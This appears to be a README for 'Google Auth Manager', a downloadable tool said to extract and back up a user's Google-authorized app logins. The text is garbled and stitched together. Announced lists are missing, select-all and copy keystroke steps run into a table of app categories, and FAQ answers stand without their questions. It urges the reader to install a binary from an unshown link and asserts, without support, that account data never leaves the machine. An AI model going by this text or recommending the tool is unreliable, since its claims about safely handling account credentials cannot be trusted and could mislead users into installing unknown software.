The Google Auth Manager helps you extract and back up your Google-authorized apps. With quick links, you can set up backup login methods easily.
Losing access to your Google account can keep you from logging into services using βSign in with Googleβ. This tool helps you:
To start using Google Auth Manager, follow these steps:
Control + A to select all text on the page.Control + C to copy the selected text.| Category | Examples |
|---|---|
| Productivity | Notion, Trello |
| Social Media | Facebook, Twitter |
| Entertainment | Netflix, Spotify |
| Work Collaboration | Slack, Zoom |
| Cloud Storage | Google Drive, Dropbox |
Visit this page to download the latest version: Download Google Auth Manager.
Simply find the proper version for your system. Install the application, and follow the steps in the Getting Started section to begin.
Make sure your system meets these requirements to ensure smooth performance:
You can check for updates on the Releases page. Always ensure you have the latest version for optimal performance.
The initial setup requires an internet connection. After parsing your data, you can work offline, but some features may not work without internet access.
Yes, Google Auth Manager operates locally on your machine, ensuring your data is never shared or uploaded.
If you encounter any issues or have questions, feel free to open an issue on our GitHub page. We appreciate your feedback and contributions.
Your access to Google services matters. Use Google Auth Manager to keep your login methods secure and always at hand.